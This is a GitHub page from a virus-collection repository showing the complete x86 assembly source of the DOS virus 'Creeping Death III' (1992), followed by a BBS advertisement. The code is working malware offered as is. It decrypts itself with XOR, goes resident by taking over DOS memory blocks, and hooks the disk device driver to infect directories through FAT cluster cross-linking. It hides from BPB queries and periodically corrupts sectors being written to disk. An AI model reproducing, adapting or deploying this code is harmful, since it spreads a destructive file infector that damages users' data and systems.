forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCdeath3.asm
executable file
·631 lines (568 loc) · 21.3 KB
/
Cdeath3.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
;*****************************************************************************;
; ;
; Creeping Death III (Encrypting, try to find it) ;
; ;
; (c) Copyright 1992 by Bit Addict ;
; ;
;*****************************************************************************;
code segment public 'code'
assume cs:code, ds:code, es:code, ss:code
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
org 5ch ; use the space reserved for
; the fcbs and command line
; for more inportant data,
; because we won't need this
; data when the virus is
; installed
EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
BPB_Buf db 32 dup(?) ; buffer for BPB
Request equ this dword ; address of the request header
RequestOffset dw ?
RequestSegment dw ?
org 100h ; com-file starts at offset 100
; hex
;*****************************************************************************;
; ;
; Actual start of virus. In this part the virus initializes the stack and ;
; adjusts the device driver used by dos to read and write from floppy's and ;
; hard disks. Then it will start the orginal exe or com-file ;
; ;
;*****************************************************************************;
Encrypt: mov si,offset Main-1 ; this part of the program
mov cx,400h-11 ; will decode the encoded
Repeat: xor byte ptr [si],0 ; program, so it can be
inc si ; executed
loop Repeat
Main: mov sp,600h ; init stack
inc word ptr Counter
;*****************************************************************************;
; ;
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
; si will be -1 ;
; ;
;*****************************************************************************;
DosVersion: mov ah,30h ; fn 30h = Get Dosversion
int 21h ; int 21h
cmp al,4 ; major dosversion
sbb di,di
mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,??
;*****************************************************************************;
; ;
; Adjust the size of the codesegment, with dos function 4ah ;
; ;
;*****************************************************************************;
mov bx,60h ; Adjust size of memory block
mov ah,4ah ; to 60 paragraphs = 600h bytes
int 21h ; int 21h
mov ah,52h ; get internal list of lists
int 21h ; int 21h
;*****************************************************************************;
; ;
; If the virus code segment is located behind the dos config memory block the ;
; code segment will be part of the config memory block making it 61h ;
; paragraphs larger. If the virus is not located next to the config memory ;
; block the virus will set the owner to 8h (Dos system) ;
; ;
;*****************************************************************************;
mov ax,es:[bx-2] ; segment of first MCB
mov dx,cs ; dx = MCB of the code segment
dec dx
NextMCB: mov ds,ax ; ax = segment next MCB
add ax,ds:[3]
inc ax
cmp ax,dx ; are they equal ?
jne NextMCB ; no, not 1st program executed
cmp word ptr ds:[1],8
jne NoBoot
add word ptr ds:[3],61h ; add 61h to size of block
NoBoot: mov ds,dx ; ds = segment of MCB
mov word ptr ds:[1],8 ; owner = dos system
;*****************************************************************************;
; ;
; The virus will search for the disk paramenter block for drive a: - c: in ;
; order to find the device driver for these block devices. If any of these ;
; blocks is found the virus will install its own device driver and set the ;
; access flag to -1 to tell dos this device hasn't been accesed yet. ;
; ;
;*****************************************************************************;
cld ; clear direction flag
lds bx,es:[bx] ; get pointer to first drive
; paramenter block
Search: cmp bx,-1 ; last block ?
je Last
mov ax,ds:[bx+di+15h] ; get segment of device header
cmp ax,70h ; dos device header ??
jne Next ; no, go to next device
xchg ax,cx
mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
; has not been accessed"
mov si,offset Header-4 ; set address of new device
xchg si,ds:[bx+di+13h] ; and save old address
mov ds:[bx+di+15h],cs
Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
jmp Search
;*****************************************************************************;
; ;
; If the virus has failed in starting the orginal exe-file it will jump here. ;
; ;
;*****************************************************************************;
Boot: mov ds,ds:[16h] ; es = parent PSP
mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
xor si,si
sub bx,1 ; filename+path available ?
jnb Exec ; yes, execute it
mov ax,cs ; get segment of MCB
dec ax
mov ds,ax
mov cl,8 ; count length of filename
mov si,8
mov di,0ffh
Count: lodsb
or al,al
loopne Count
not cl
and cl,7
NextByte: mov si,8 ; search for this name in the
inc di ; parent PSP to find the path
push di ; to this file
push cx
rep cmpsb
pop cx
pop di
jne NextByte
BeginName: dec di ; name found, search for start
cmp byte ptr es:[di-1],0 ; of name+path
jne BeginName
mov si,di
mov bx,es
jmp short Exec ; execute it
;*****************************************************************************;
; ;
; If none of these devices is found it means the virus is already resident ;
; and the virus wasn't able to start the orginal exe-file (the file is ;
; corrupted by copying it without the virus memory resident). If the device ;
; is found the information in the header is copied. ;
; ;
;*****************************************************************************;
Last: jcxz Exit
;*****************************************************************************;
; ;
; The information about the dos device driver is copyed to the virus code ;
; segment ;
; ;
;*****************************************************************************;
mov ds,cx ; ds = segment of Device Driver
add si,4
push cs
pop es
mov di,offset Header ; prepare header of the viral
movsw ; device driver and save the
lodsw ; address of the dos strategy
mov es:StrBlock,ax ; and interrupt procedures
mov ax,offset Strategy
stosw
lodsw
mov es:IntBlock,ax
mov ax,offset Interrupt
stosw
movsb
;*****************************************************************************;
; ;
; Deallocate the environment memory block and start the this file again, but ;
; if the virus succeeds it will start the orginal exe-file. ;
; ;
;*****************************************************************************;
push cs
pop ds
mov bx,ds:[2ch] ; environment segment
or bx,bx ; environment available ?
jz Boot ; no, computer is rebooted
mov es,bx
mov ah,49h ; deallocate memory
int 21h
xor ax,ax ; end of environment is marked
mov di,1 ; with two zero bytes
Seek: dec di ; scan for end of environment
scasw
jne Seek
lea si,ds:[di+2] ; es:si = start of filename
Exec: push bx
push cs
pop ds
mov bx,offset Param
mov ds:[bx+4],cs ; set segments in EPB
mov ds:[bx+8],cs
mov ds:[bx+12],cs
pop ds
push cs
pop es
mov di,offset Filename ; copy name of this file
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh ; open file, this file will
mov dx,offset File ; not be found but the entire
int 21h ; directory is searched and
pop dx ; infected
mov ax,4b00h ; execute file
int 21h
Exit: mov ah,4dh ; get exit-code
int 21h
mov ah,4ch ; terminate (al = exit code)
int 21h
;*****************************************************************************;
; ;
; Installation complete ;
; ;
;*****************************************************************************;
; ;
; The next part contains the device driver used by creeping death to infect ;
; directory's ;
; ;
; The device driver uses only the strategy routine to handle the requests. ;
; I don't know if this is because the virus will work better or the writer ;
; of this virus didn't know how to do it right. ;
; ;
;*****************************************************************************;
Strategy: mov cs:RequestOffset,bx ; store segment and offset of
mov cs:RequestSegment,es ; request block
retf ; return to dos (or whatever
; called this device driver)
Interrupt: push ax ; driver strategy block
push bx ; save registers
push cx
push dx
push si
push di
push ds
push es
les bx,cs:Request ; es:bx = request block
push es ; ds:bx = request block
pop ds
mov al,ds:[bx+2] ; command code
cmp al,4 ; read sector from disk
je Input
cmp al,8 ; write sector to disk
je Output
cmp al,9
je Output
call DoRequest ; let dos do handle the request
cmp al,2 ; Build BPB
jne Return
lds si,ds:[bx+12h] ; copy the BPB and change it
mov di,offset bpb_buf ; into one that hides the virus
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es ; copy
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,ds:[di+2-32] ; change
cmp al,2
adc al,0
cbw
cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
je m32 ; yes, jump to m32
sub ds:[di+8-32],ax ; <32mb partition
jmp short Return
m32: sub ds:[di+15h-32],ax ; >32mb partition
sbb word ptr ds:[di+17h-32],0
Return: pop es ; return to caller
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
retf
Output: inc byte ptr cs:Random ; increase counter
jnz Skip ; zero ?
push bx ; yes, change one byte in the
push ds ; sector to write
lds bx,ds:[bx+16h]
inc bh
inc byte ptr ds:[bx] ; destroy some data
pop ds
pop bx
Skip: mov cx,0ff09h
call Check ; check if disk changed
jz Disk ; yes, write virus to disk
jmp InfectSector ; no, just infect sector
Disk: call DoRequest
jmp short InfectDisk
ReadError: add sp,16 ; error during request
jmp short Return
Input: call check ; check if disk changed
jnz InfectDisk ; no, read sector
jmp Read
InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
cld ; save last part of request
lea si,ds:[bx+0eh]
mov cx,8
Save: lodsw
push ax
loop Save
mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
call ReadSector
jnz ReadError
mov byte ptr ds:[bx+2],2 ; build BPB
call DoRequest
lds si,ds:[bx+12h] ; ds:si = BPB
mov di,ds:[si+6] ; size of root directory
add di,15 ; in sectors
mov cl,4
shr di,cl
mov al,ds:[si+5]
cbw
mov dx,ds:[si+0bh]
mul dx ; ax=fat sectors, dx=0
add ax,ds:[si+3]
add di,ax
push di ; save it on stack
mov ax,ds:[si+8] ; total number of sectors
cmp ax,dx ; >32mb
jnz More ; no, skip next 2 instructions
mov ax,ds:[si+15h] ; get number of sectors
mov dx,ds:[si+17h]
More: xor cx,cx ; cx=0
sub ax,di ; dx:ax=number is data sectors
sbb dx,cx
mov cl,ds:[si+2] ; cx=sectors / cluster
div cx ; number of clusters on disk
cmp cl,2 ; 1 sector/cluster ?
sbb ax,-1 ; number of clusters (+1 or +2)
push ax ; save it on stack
call Convert ; get fat sector and offset in
mov byte ptr es:[bx+2],4 ; sector
mov es:[bx+14h],ax
call ReadSector ; read fat sector
lds si,es:[bx+0eh]
add si,dx
sub dh,cl ; has something to do with the
adc dx,ax ; encryption of the pointers
mov word ptr cs:[gad+1],dx
cmp cl,1 ; 1 sector / cluster
jne Ok
not di ; this is used when the
and ds:[si],di ; clusters are 1 sector long
pop ax ; allocate 1st cluster
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz Here
inc dx
mul dx
Here: or ds:[si],ax
pop ax
call Convert
mov si,es:[bx+0eh]
add si,dx
Ok: mov ax,ds:[si] ; allocate last cluster
and ax,di
mov dx,di
dec dx
and dx,di
not di
and ds:[si],di
or ds:[si],dx
cmp ax,dx ; cluster already allocated by
pop ax ; the virus ?
pop di
mov word ptr cs:[pointer+1],ax
je DiskInfected ; yes, don't write it and go on
mov dx,ds:[si]
mov byte ptr es:[bx+2],8 ; write the adjusted sector to
call DoRequest ; disk
jnz DiskInfected
mov byte ptr es:[bx+2],4 ; read it again
call ReadSector
cmp ds:[si],dx ; is it written correctly ?
jne DiskInfected ; no, can't infect disk
dec ax
dec ax ; calculate the sector number
mul cx ; to write the virus to
add ax,di
adc dx,0
push es
pop ds
mov word ptr ds:[bx+12h],2
mov ds:[bx+14h],ax ; store it in the request hdr
test dx,dx
jz Less
mov word ptr ds:[bx+14h],-1
mov ds:[bx+1ah],ax
mov ds:[bx+1ch],dx
Less: mov ds:[bx+10h],cs
mov ds:[bx+0eh],100h
mov byte ptr es:[bx+2],8 ; write it
call EncryptWrite1
DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte
std ; restore other part of the
lea di,ds:[bx+1ch] ; request
mov cx,8
Load: pop ax
stosw
loop Load
Read: call DoRequest ; do request
mov cx,9
InfectSector: mov di,es:[bx+12h] ; get number of sectors read
lds si,es:[bx+0eh] ; get address of data
sal di,cl ; calculate end of buffer
xor cl,cl
add di,si
xor dl,dl
push ds ; infect the sector
push si
call find
jcxz no_inf ; write sector ?
mov al,8
xchg al,es:[bx+2] ; save command byte
call DoRequest ; write sector
mov es:[bx+2],al ; restore command byte
and byte ptr es:[bx+4],07fh
no_inf: pop si
pop ds
inc dx ; disinfect sector in memory
call find
jmp Return ; return to caller
;*****************************************************************************;
; ;
; Subroutines ;
; ;
;*****************************************************************************;
Find: mov ax,ds:[si+8] ; (dis)infect sector in memory
cmp ax,"XE" ; check for .exe
jne com
cmp ds:[si+10],al
je found
Com: cmp ax,"OC" ; check for .com
jne go_on
cmp byte ptr ds:[si+10],"M"
jne go_on
Found: test word ptr ds:[si+1eh],0ffc0h ; file to big
jnz go_on ; more than 4mb
test word ptr ds:[si+1dh],03ff8h ; file to small
jz go_on ; less than 2048 bytes
test byte ptr ds:[si+0bh],1ch ; directory, system or
jnz go_on ; volume label
test dl,dl ; infect or disinfect ?
jnz rest
Pointer: mov ax,1234h ; ax = viral cluster
cmp ax,ds:[si+1ah] ; file already infected ?
je go_on ; yes, go on
xchg ax,ds:[si+1ah] ; exchange pointers
Gad: xor ax,1234h ; encryption
mov ds:[si+14h],ax ; store it on another place
loop go_on ; change cx and go on
Rest: xor ax,ax ; ax = 0
xchg ax,ds:[si+14h] ; get pointer
xor ax,word ptr cs:[gad+1] ; Encrypt
mov ds:[si+1ah],ax ; store it on the right place
Go_on: rol word ptr cs:[gad+1],1 ; change encryption
add si,32 ; next directory entry
cmp di,si ; end of buffer ?
jne find ; no, do it again
ret ; return
Check: mov ah,ds:[bx+1] ; get number of unit
Drive: cmp ah,-1 ; same as last call ?
mov byte ptr cs:[drive+2],ah ; set 2nd parameter
jne Changed
push ds:[bx+0eh] ; save word
mov byte ptr ds:[bx+2],1 ; disk changed ?
call DoRequest
cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
pop ds:[bx+0eh] ; restore word
mov ds:[bx+2],al ; restore command
Changed: ret ; return
ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
DoRequest: db 09ah ; call 70:?, orginal strategy
StrBlock dw ?,70h
db 09ah ; call 70:?, orginal interrupt
IntBlock dw ?,70h
test byte ptr es:[bx+4],80h ; error ? yes, zf = 0
ret ; return
Convert: cmp ax,0ff0h ; convert cluster number into
jae Fat16 ; an sector number and offset
mov si,3 ; into this sector containing
xor word ptr cs:[si+gad-1],si ; the fat-item of this
mul si ; cluster
shr ax,1
mov di,0fffh
jnc Continue
mov di,0fff0h
jmp short Continue
Fat16: mov si,2
mul si
mov di,0ffffh
Continue: mov si,512
div si
inc ax
ret
EncryptWrite1: push ds ; write virus to disk
push cs ; (encrypted) save regs
pop ds
push es
push cs
pop es
cld ; copy forward
mov cx,12 ; length of encryptor
mov si,offset Encrypt ; start of encryptor
mov di,offset EncryptWrite2 ; destenation
inc byte ptr ds:[si+8] ; change xor value
rep movsb ; copy encryptor
mov cl,10 ; copy dorequest proc
mov si,offset DoRequest
rep movsb
mov cl,12 ; copy encryptor
mov si,offset Encrypt
rep movsb
mov ax,0c31fh ; store "pop ds","ret"
stosw ; instructions
pop es ; restore register
jmp EncryptWrite2 ; encrypt and write vir
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
File db "C:",255,0 ; the virus tries to open this
; file
Counter dw 0 ; this will count the number of
; systems that are infected by
; this virus
Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the
; exec-function
Random db ? ; if this byte becomes zero
; the virus will change the
; sector that will be written
; to disk
Header db 7 dup(?) ; this is the header for the
; device driver
Filename db ? ; Buffer for the filename used
; by the exec-function
;*****************************************************************************;
; ;
; The End ;
; ;
;*****************************************************************************;
code ends ; end of the viral code
end Encrypt ; start at offset 100h for
; com-file
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ